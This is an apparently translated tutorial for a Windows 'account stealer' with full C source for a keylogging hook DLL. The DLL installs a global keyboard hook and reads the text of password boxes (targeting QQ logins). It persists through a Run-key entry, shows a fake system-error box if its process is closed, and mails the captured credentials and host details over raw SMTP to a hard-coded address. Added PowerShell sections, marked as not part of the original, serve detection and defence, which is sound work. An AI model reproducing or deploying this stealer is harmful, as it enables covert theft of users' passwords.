Implementation principle of a small account stealer in VC
The implementation principle is simple. It consists of two parts: 1. hook into the foreground application; 2. collect the required information (that is, the password).
So how do we hook into other programs? The answer is a Windows hook.
The hook mechanism lets an application intercept and process Windows messages or specific events. Similar to the interrupt-handling mechanism of DOS, a hook is a point in the Windows message-processing chain where an application can install a subroutine to monitor the messages of a specified window, and the monitored window may have been created by another process. The consequence is the important part for us: a hook that applies to other processes must live in a DLL, and Windows loads that DLL into every process whose messages the hook intercepts. In other words, installing any system-wide hook gets our code loaded into other processes.

For account theft, I think the keyboard hook and the mouse hook are very suitable. I installed a keyboard hook so that whenever someone presses a key, the keystroke first passes through our hook procedure and only then reaches the process that should receive it. Hooks are installed with the API function SetWindowsHookEx(), which adds an application-defined hook procedure to the hook chain.

Two caveats on current Windows versions: since Windows Vista, User Interface Privilege Isolation stops a hook installed from a lower-integrity process from being loaded into higher-integrity processes, and a 32-bit hook DLL is only loaded into 32-bit processes, so a hook of this kind no longer reaches every window on the desktop.
The prototype is as follows:
HHOOK SetWindowsHookEx(
    int idHook,        // the hook type; we use WH_KEYBOARD
    HOOKPROC lpfn,     // pointer to the hook procedure, i.e. the function that processes the keystrokes and looks for the password; also called the callback function
    HINSTANCE hMod,    // handle of the module that contains lpfn; for a hook that reaches other processes this must be the handle of our DLL
    DWORD dwThreadId   // identifier of the thread the hook is associated with; 0 means all threads on the same desktop. We choose 0; I don't need to say why.
);
On success the function returns the hook handle; on failure it returns NULL.
Note that to associate the hook with all threads, the hook procedure must be in a DLL (hooks are generally installed from a DLL). We can also put all of the code in the DLL so that, once it has been loaded into the target application, it keeps working even if the stealer's main program is closed; the DLL can also watch whether the main program is still running and, if it has been shut down, restart it or raise a system error to reboot the machine, so that the process is not easily closed. After installing the hook we need to consider the callback function. Its general shape is:
LRESULT CALLBACK HookProc(
    int nCode,       // hook code; the procedure should only act when this is HC_ACTION
    WPARAM wParam,   // for WH_KEYBOARD: the virtual-key code of the key
    LPARAM lParam    // for WH_KEYBOARD: the keystroke data (repeat count, scan code, extended-key flag, previous key state, transition state); it is not a pointer to a message structure
);
In this way, whenever the user presses a key, the system calls our callback function before the foreground program sees the keystroke. At this point we have basically hooked into other programs.
Next, we need to consider how to process the collected information: which window receives the keyboard input, what its title is, and whether it contains a password input box.
Which window receives the keyboard input? Use the API function HWND GetForegroundWindow(void);
This function returns the foreground window (the window the user is currently working in); the system gives the thread that created the foreground window a slightly higher priority. Return value: the handle of the foreground window. The handle alone does not tell us which window this is, so we need one more function:
int GetWindowText(
    HWND hWnd,         // handle of the window or control whose text we want
    LPTSTR lpString,   // pointer to the buffer that receives the text
    int nMaxCount      // maximum number of characters to copy into the buffer, including the terminating null; longer text is truncated
);
This function copies the title text (if any) of the specified window into a buffer.
Note: GetWindowText cannot retrieve the text of a control in another application.
Yet the code below uses this very function to obtain the password. Why?
The reason is simple: once the DLL has been loaded into the other program, the hook function is effectively part of that program's own code, so it can use this function to read the password (personal opinion).
That is indeed how the API behaves: GetWindowText sends WM_GETTEXT to the control only when the control belongs to the calling process, and because the hook DLL is loaded into the process that owns the foreground window, the call is made from inside that process. Since Windows XP an ES_PASSWORD edit control does not return its contents to a WM_GETTEXT sent from another process, which is exactly the barrier that running inside the process avoids.
If the function succeeds, the return value is the number of characters copied. If the window has no title bar or text, the title bar is empty, or the window or control handle is invalid, the return value is zero. (The QQ login window is specially handled, so we don't get the characters of the QQ login this way.)
Now we know that GetWindowText can obtain the password text, but most windows contain no password at all. A QQ chat window, for example, is full of ordinary text; how do we know whether a given window holds a password? And the QQ login window contains more than the password: the QQ number, the "Registration Wizard" and "Forgot password" links, and so on. So we need a way to walk the controls of a window and decide whether one of them is a password box.
BOOL EnumChildWindows(
    HWND hWndParent,          // handle of the parent window whose child windows are enumerated
    WNDENUMPROC lpEnumFunc,   // like the hook procedure, a callback: it is called once for each child window found
    LPARAM lParam             // application-defined value passed through to the callback
);
This function walks the child windows of the specified parent and calls the callback for each of them; in the callback we decide whether the child is a password input box.
The GetWindowLong function helps with that. Its prototype:
LONG GetWindowLong(
    HWND hWnd,    // window handle
    int nIndex    // zero-based offset of the value to retrieve, or one of the negative GWL_ constants. I do not know much about this value; all I need to know is that
                  // GWL_STYLE (to get the window style) is enough
);
After obtaining the window style, an if statement tests the ES_PASSWORD bit to decide whether the window is a password box.
One check a careful implementation adds here: ES_PASSWORD (0x0020) is only meaningful for the "Edit" window class. The same bit is BS_LEFTTEXT on a button and CBS_OWNERDRAWVARIABLE on a combo box, so test the class with GetClassName() first, otherwise unrelated controls are mistaken for password boxes (the code below checks the class only when labelling the log entry, not when deciding that a password box was found).
If the window is a password box, GetWindowText gets the password.
Is it easy?
Let me give you the overall idea:
1. SetWindowsHookEx: install the hook
2. Hook procedure: process the keystroke
3. GetForegroundWindow: get the current window
4. GetWindowText: get the window title
5. EnumChildWindows: enumerate the children of the current window
6. Enumeration callback: check each child for the password style and, if it is a password box, read its text with GetWindowText
7. Send the email
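The defender's side of the same seven steps, as an added example that is not part of the original article: a PowerShell script that hunts for the two host artifacts this design leaves behind, a DLL mapped into most processes on the desktop (the global hook DLL) and a Run-key autostart entry. The 80% threshold, the allow-list of modules under the Windows directory and the use of Authenticode status as the triage signal are assumptions of this example, not something the article states; run it from an elevated PowerShell, since the module lists of other users' processes are otherwise not readable.

```powershell
# Added example, not part of the original article: hunting for the host artifacts of a
# global WH_KEYBOARD hook. Run from an elevated PowerShell. The 80% threshold, the
# Windows-directory allow-list and the Authenticode check are this example's assumptions.

function Find-WidelyLoadedModules {
    # A system-wide hook DLL is mapped into every process that receives the hooked
    # messages, so a DLL present in most processes but not shipped under %SystemRoot%
    # deserves a look.
    param([double]$MinFraction = 0.8)
    $counts = @{}
    $inspected = 0
    foreach ($proc in Get-Process) {
        if ($proc.Id -eq $PID) { continue }
        try { $mods = $proc.Modules } catch { continue }    # protected processes deny access
        if (-not $mods) { continue }
        $inspected++
        foreach ($path in ($mods.FileName | Where-Object { $_ } | Sort-Object -Unique)) {
            $counts[$path] = 1 + [int]$counts[$path]
        }
    }
    foreach ($path in $counts.Keys) {
        if ($counts[$path] / [math]::Max($inspected, 1) -lt $MinFraction) { continue }
        if ($path.StartsWith($env:SystemRoot, [StringComparison]::OrdinalIgnoreCase)) { continue }
        [pscustomobject]@{
            Path      = $path
            Processes = "$($counts[$path])/$inspected"
            Signature = (Get-AuthenticodeSignature -FilePath $path).Status
        }
    }
}

function Get-RunKeyEntries {
    # The article's Reg() writes HKLM\...\Run\qqkavqqrun = <system dir>\cssystema.exe.
    # List every autostart value of the two Run keys with the signature state of its executable.
    $keys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
            'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    foreach ($key in $keys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($name in $props.PSObject.Properties.Name) {
            if ($name -like 'PS*') { continue }              # provider metadata, not registry values
            $value = [string]$props.$name
            # the value may be quoted and may carry arguments; keep only the executable path
            $exe = $value
            if ($value -match '^"([^"]+)"') { $exe = $Matches[1] }
            elseif ($value -match '^(.+?\.exe)') { $exe = $Matches[1] }
            $exe = [Environment]::ExpandEnvironmentVariables($exe)
            $status = 'FileMissing'
            if (Test-Path -LiteralPath $exe) { $status = (Get-AuthenticodeSignature -FilePath $exe).Status }
            [pscustomobject]@{ Key = $key; Name = $name; Path = $exe; Signature = $status }
        }
    }
}

Find-WidelyLoadedModules | Format-Table -AutoSize
Get-RunKeyEntries | Where-Object { $_.Signature -ne 'Valid' } | Format-Table -AutoSize
```

A WH_KEYBOARD hook DLL is only loaded into processes that receive keyboard messages, so services and console-only processes will not contain it and the reported fraction will rarely be 100%; the triage signal is an unsigned or unexpectedly signed DLL loaded from outside the Windows directory into nearly every interactive process. The Run-key function reports every entry; the filter on Signature at the end keeps only the ones without a valid Authenticode signature.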
The code I wrote is as follows.
Because I basically have no time to use a computer at school, some functions are not implemented well yet, but the general outline is there.
#include <windows.h>
#include <stdio.h>
#include "ksydll.h"
#define WM_MYSCOKET 0x0090                        // custom message sent to the EXE to ask it to send the mail

HINSTANCE hIns;                                   // module handle of this DLL, which contains the hook procedure

#pragma data_seg("shared")                        // shared data segment: one copy for every process that loads the DLL
HWND keepMy = NULL;                               // window handle of the EXE that loaded the DLL
char fileLog[250] = "";                           // file the captured text is written to
char fileBak[250] = "";                           // backup file used while the network is down
char IP[25] = "";                                 // SMTP server address
char mailTo[70] = "rcpt to: <";                   // SMTP command
BOOL exeOk = TRUE;                                // whether the EXE is still running
BOOL netLink = FALSE;                             // whether the network is reachable
#pragma data_seg()
#pragma comment(linker, "/section:shared,RWS")

HWND keyDll = NULL;                               // window in which a password box was found
BOOL yesNoTo = FALSE;                             // whether a password has been captured
BOOL windowsNet = FALSE;                          // whether the foreground window contains a password box
static HHOOK hkb = NULL;
char pass[50][255];                               // captured password strings
int passInt;

BOOL DelKsyDll();
BOOL Reg();
BOOL CALLBACK FindTrayWnd(HWND hwnd, LPARAM lParam);           // EnumChildWindows callback
extern "C" __declspec(dllexport) void NetBoolTo(BOOL netOk);   // declared here because KeyboardProc calls them before they are defined
extern "C" __declspec(dllexport) BOOL NetOk(int net);

// Hook procedure: called for every keyboard message in every process the DLL is loaded into
LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam)
{
    HWND myKeyHdc;
    // bit 30 of lParam is the previous key state, so this fires on key-up (and auto-repeat), not on the first key-down
    if (((DWORD)lParam & 0x40000000) && (HC_ACTION == code))
    {
        char szCaptions[255] = "";
        Reg();
        myKeyHdc = GetForegroundWindow();
        // is the foreground window still the one in which a password box was found?
        if (myKeyHdc == keyDll)
        {
            FILE *fp;
            fp = fopen(fileLog, "w");                  // truncate the log
            fclose(fp);
            if (windowsNet)
            {
                int temp = 1;
                char szClassName[255] = "";
                FILE *fp;
                fp = fopen(fileLog, "a");              // the mode string was lost in the original text; "a" (append) is assumed
                fwrite("window name --->", strlen("window name --->"), 1, fp);
                fwrite(szClassName, strlen(szClassName), 1, fp);
                fclose(fp);
                passInt = 0;
                EnumChildWindows(myKeyHdc, FindTrayWnd, (LPARAM)&temp);   // enumerate the child windows
            }
        }
        else // a different window is in the foreground
        {
            int temps = 2;
            windowsNet = FALSE;
            // is there something to mail?
            if (yesNoTo)
            {
                // send the mail
                yesNoTo = !yesNoTo;
                if (netLink)
                {
                    NetBoolTo(NetOk(2));
                    // the timeout value was garbled in the original text; 1500 ms is assumed
                    if (SendMessageTimeout(keepMy, WM_MYSCOKET, 0, 0, SMTO_ABORTIFHUNG, 1500, 0) == 0)
                        exeOk = FALSE;
                }
                else
                {
                    FILE *fp;
                    FILE *ff;
                    char c;
                    fp = fopen(fileBak, "a");          // mode lost in the original text; append assumed
                    ff = fopen(fileLog, "r");
                    fwrite("The following is the information recorded while the network was down",
                           sizeof("The following is the information recorded while the network was down"), 1, fp);
                    fputc(10, fp);
                    c = fgetc(ff);
                    while (!feof(ff))
                    {
                        fputc(c, fp);
                        c = fgetc(ff);
                    }
                    fclose(fp);
                    fclose(ff);
                }
            }
            // look for a password box (asterisks) in the new foreground window
            passInt = 0;
            EnumChildWindows(myKeyHdc, FindTrayWnd, (LPARAM)&temps);
            if (temps == 3)
            {
                windowsNet = TRUE;
                // yesNoTo = TRUE;
                keyDll = myKeyHdc;
            }
        }
    }
    if (exeOk)
        return CallNextHookEx(hkb, code, wParam, lParam);
    else
    {
        // raise an error if the main program has been closed
        return (MessageBox(myKeyHdc, "Serious system error\nPlease try restarting!", "Error", MB_ICONWARNING));
    }
}

// Install the hook
extern "C" __declspec(dllexport) BOOL InstHook(HWND hwnd)
{
    if (hwnd != NULL)
        keepMy = hwnd;
    if (strcmp(mailTo, "rcpt to: <") == 0)
        strcat(mailTo, "shunyuncc@163.com>\n");
    int i = 0;
    char sysPath[MAX_PATH];
    DWORD size = MAX_PATH;
    GetSystemDirectory(sysPath, size);
    strcpy(fileLog, sysPath);
    strcat(fileLog, "\\keyslog.txt");
    for (i = 0; i <= (int)strlen(fileLog); i++)
        fileLog[i] = tolower(fileLog[i]);
    strcpy(fileBak, sysPath);
    strcat(fileBak, "\\baklog.txt");
    for (i = 0; i <= (int)strlen(fileBak); i++)
        fileBak[i] = tolower(fileBak[i]);
    hkb = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)KeyboardProc, hIns, 0);   // the core statement: install a global keyboard hook
    return TRUE;
}

// DLL entry point
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    hIns = hinstDLL;
    InstHook(NULL);     // fdwReason is not checked, so this runs on every DLL_PROCESS_ATTACH, i.e. in every process the hook DLL is loaded into
    return TRUE;
}

// Enumeration callback: called once for each child window
BOOL CALLBACK FindTrayWnd(HWND hwnd, LPARAM lParam)
{
    int *callTemp = (int *)lParam;
    if (*callTemp == 1)
    {
        char szClassName[255] = "";
        GetWindowText(hwnd, szClassName, 255);              // text of the child window
        LONG lStyle = GetWindowLong(hwnd, GWL_STYLE);       // window style
        if (lStyle & ES_PASSWORD)                           // password box? (the bit is only meaningful for the Edit class; see the note above)
            if (strcmp(pass[passInt], szClassName) != 0)
            {
                yesNoTo = TRUE;
                passInt++;
            }
        if (szClassName != NULL)                            // always true for an array; kept from the original
        {
            FILE *fp;
            char temp[255];
            fp = fopen(fileLog, "a");                       // mode lost in the original text; append assumed
            GetClassName(hwnd, temp, 255);
            if (strcmp(temp, "Edit") == 0)
            {
                if (lStyle & ES_PASSWORD)
                    fwrite("------------------- password input box --->", strlen("------------------- password input box --->"), 1, fp);
                else
                    fwrite("input box --->", strlen("input box --->"), 1, fp);
            }
            if (strcmp(temp, "Static") == 0)
                fwrite("prompt box --->", strlen("prompt box --->"), 1, fp);
            fwrite(szClassName, strlen(szClassName), 1, fp);
            fputc(10, fp);
            fclose(fp);
        }
    }
    if (*callTemp == 2)
    {
        LONG lStyle = GetWindowLong(hwnd, GWL_STYLE);
        if (lStyle & ES_PASSWORD)                           // no class check here, so any control with bit 0x20 set is treated as a password box
        {
            // char szClassName[255] = "";
            memset(pass[passInt], 0, strlen(pass[passInt]));
            GetWindowText(hwnd, pass[passInt], 255);
            passInt++;
            // if (strlen(pass[passInt]) != 0)
            *callTemp = 3;
        }
    }
    return TRUE;
}

// Record whether the network is reachable
extern "C" __declspec(dllexport) void NetBoolTo(BOOL netOk)
{
    netLink = netOk;
    return;
}

// Mail function
extern "C" __declspec(dllexport) BOOL NetOk(int net)
{
    char temp[600] = "";
    struct sockaddr_in server;
    SOCKET serverSock;
    WSADATA wsaData;
    WSAStartup(0x0101, &wsaData);
    if (net == 1)
    {
        hostent *pHostEnt = gethostbyname("211.215.19.90");
        if (pHostEnt == NULL)
            return FALSE;
        hostent &he = *pHostEnt;
        sockaddr_in sa;
        for (int nAdapter = 0; he.h_addr_list[nAdapter]; nAdapter++)
            memcpy(&sa.sin_addr.s_addr, he.h_addr_list[nAdapter], he.h_length);
        memset(IP, 0, sizeof(IP));
        strcpy(IP, inet_ntoa(sa.sin_addr));
    }
    if (net == 2)
    {
        FILE *fp;
        char temps;
        server.sin_family = AF_INET;
        serverSock = socket(AF_INET, SOCK_STREAM, 0);
        server.sin_port = htons(24);
        serverSock = socket(AF_INET, SOCK_STREAM, 0);       // duplicated in the original; the first socket is leaked
        server.sin_addr.s_addr = inet_addr(IP);
        if (connect(serverSock, (struct sockaddr *)&server, sizeof(server)) != 0)
        {
            NetBoolTo(FALSE);
            return FALSE;
        }
        send(serverSock, "HELO command\r\n", strlen("HELO command\r\n"), 0);
        recv(serverSock, temp, 600, 0);
        // MessageBox(NULL, temp, "password", 0);
        // cout << temp << endl;
        memset(temp, 0, sizeof(temp));
        send(serverSock, "mail from: <Hacker@shunyuncc.20cn.com>\r\n", strlen("mail from: <Hacker@shunyuncc.20cn.com>\r\n"), 0);
        recv(serverSock, temp, 600, 0);
        // MessageBox(NULL, temp, "password", 0);
        // cout << temp << endl;
        memset(temp, 0, sizeof(temp));
        send(serverSock, "rcpt to: <shunyuncc@163.com>\r\n", strlen("rcpt to: <shunyuncc@163.com>\r\n"), 0);
        recv(serverSock, temp, 600, 0);
        // MessageBox(NULL, temp, "password", 0);
        // cout << temp << endl;
        memset(temp, 0, sizeof(temp));
        send(serverSock, "Data\r\n", strlen("Data\r\n"), 0);
        recv(serverSock, temp, 600, 0);
        // MessageBox(NULL, temp, "password", 0);
        // cout << temp << endl;
        memset(temp, 0, sizeof(temp));
        send(serverSock, "Subject: minor account theft 1.0\r\n", strlen("Subject: minor account theft 1.0\r\n"), 0);
        send(serverSock, "\r\n", strlen("\r\n"), 0);
        char hostname[256];
        gethostname(hostname, sizeof(hostname));
        send(serverSock, "host name -->", strlen("host name -->"), 0);
        send(serverSock, hostname, strlen(hostname), 0);
        send(serverSock, "\n", strlen("\n"), 0);
        hostent *pHostEnt = gethostbyname(hostname);
        hostent &he = *pHostEnt;
        sockaddr_in sa;
        for (int nAdapter = 0; he.h_addr_list[nAdapter]; nAdapter++)
        {
            memcpy(&sa.sin_addr.s_addr, he.h_addr_list[nAdapter], he.h_length);
            send(serverSock, "Host IP -->", strlen("Host IP -->"), 0);
            send(serverSock, inet_ntoa(sa.sin_addr), strlen(inet_ntoa(sa.sin_addr)), 0);
            send(serverSock, "\n", strlen("\n"), 0);
        }
        fp = fopen(fileBak, "a");                           // mode lost in the original text; append assumed (creates the file if missing)
        fclose(fp);
        fp = fopen(fileBak, "r");
        temps = fgetc(fp);
        while (!feof(fp))
        {
            send(serverSock, &temps, 1, 0);
            temps = fgetc(fp);
        }
        fclose(fp);
        fp = fopen(fileBak, "w");
        fclose(fp);
        fp = fopen(fileLog, "r");
        temps = fgetc(fp);
        while (!feof(fp))
        {
            send(serverSock, &temps, 1, 0);
            temps = fgetc(fp);
        }
        fclose(fp);
        send(serverSock, "\r\n.\r\n", strlen("\r\n.\r\n"), 0);
        send(serverSock, "Quit\r\n", strlen("Quit\r\n"), 0);
        recv(serverSock, temp, 600, 0);
        closesocket(serverSock);
    }
    WSACleanup();
    return TRUE;
}

// Write the autostart value to the registry
BOOL Reg()
{
    char sysPath[MAX_PATH];
    DWORD size = MAX_PATH;
    LONG ret;
    int i = 0;
    HKEY hKey;
    DWORD type = REG_SZ;
    char fileExe[250] = "";
    LPCTSTR rgsPath = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
    GetSystemDirectory(sysPath, size);
    strcpy(fileExe, sysPath);
    strcat(fileExe, "\\cssystema.exe");
    for (i = 0; i <= (int)strlen(fileExe); i++)
        fileExe[i] = tolower(fileExe[i]);
    ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE, rgsPath, 0, KEY_WRITE, &hKey);
    if (ret != ERROR_SUCCESS)
        RegCloseKey(hKey);          // the original does not return here, so RegSetValueEx is still called with an invalid handle
    ret = RegSetValueEx(hKey, "qqkavqqrun", NULL, type, (const unsigned char *)fileExe, size);   // writes MAX_PATH bytes rather than strlen+1
    RegCloseKey(hKey);
    return TRUE;
}
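The mail session that NetOk() produces is plain SMTP on a raw TCP socket with the log-file markers in the body, so it is easy to recognise on the wire. As an added example (not the article's code), the following PowerShell reconstructs the message from the client half of a captured TCP stream and flags the traits of this exfiltration. The sample stream is constructed to match what NetOk() sends (the addresses are the ones in the code above; the host name, IP and captured text are made up), and the port list and body markers are this example's assumptions.

```powershell
# Added example, not part of the original article: reconstruct the article's mail session
# from the client half of a captured TCP stream and flag the traits of the exfiltration.
# The port list and the body markers are this example's assumptions.

function ConvertFrom-SmtpClientStream {
    param([Parameter(Mandatory)][string]$ClientBytes)
    $msg = [ordered]@{ From = $null; To = @(); Subject = $null; Body = @() }
    $inData = $false
    $inHeaders = $false
    foreach ($line in ($ClientBytes -split "`r?`n")) {
        if ($inData) {
            if ($line -eq '.') { $inData = $false; continue }         # end-of-data marker
            if ($inHeaders) {
                if ($line -eq '') { $inHeaders = $false; continue }   # blank line ends the headers
                if ($line -match '^Subject:\s*(.*)$') { $msg.Subject = $Matches[1] }
                continue
            }
            $msg.Body += $line
            continue
        }
        switch -Regex ($line) {                                      # SMTP verbs are case-insensitive, as is switch
            '^MAIL FROM:\s*<?([^>\s]*)>?' { $msg.From = $Matches[1] }
            '^RCPT TO:\s*<?([^>\s]*)>?'   { $msg.To += $Matches[1] }
            '^DATA$'                      { $inData = $true; $inHeaders = $true }
        }
    }
    [pscustomobject]$msg
}

function Test-CredentialExfil {
    param([pscustomobject]$Message, [int]$DestinationPort)
    $reasons = @()
    if ($DestinationPort -notin 25, 465, 587) { $reasons += "SMTP to non-mail port $DestinationPort" }
    if ($Message.Body -match 'password input box --->') { $reasons += 'keylogger password marker in body' }
    if ($Message.Body -match '^host name -->') { $reasons += 'victim host fingerprint in body' }
    if ($Message.Subject -match 'account theft') { $reasons += "subject: $($Message.Subject)" }
    $reasons
}

# Constructed sample: what NetOk() above sends, in order, to port 24 (server replies omitted).
$sample = @(
    'HELO command'
    'mail from: <Hacker@shunyuncc.20cn.com>'
    'rcpt to: <shunyuncc@163.com>'
    'Data'
    'Subject: minor account theft 1.0'
    ''
    'host name -->VICTIM-PC'
    'Host IP -->192.0.2.10'
    'window name --->QQ user login'
    '------------------- password input box --->hunter2'
    '.'
    'Quit'
) -join "`r`n"

$message = ConvertFrom-SmtpClientStream -ClientBytes $sample
$message | Format-List
Test-CredentialExfil -Message $message -DestinationPort 24
```

Every trait the function tests is a consequence of the design in the article: the DLL speaks SMTP itself instead of going through a mail client, it talks to a hard-coded server on an arbitrary port, and the body is the unencrypted log file. On the endpoint the matching control is an outbound firewall rule that allows TCP 25/587 only to the organisation's mail relay, which turns the `connect()` in NetOk() into the failure path that parks the captured text in baklog.txt instead of sending it.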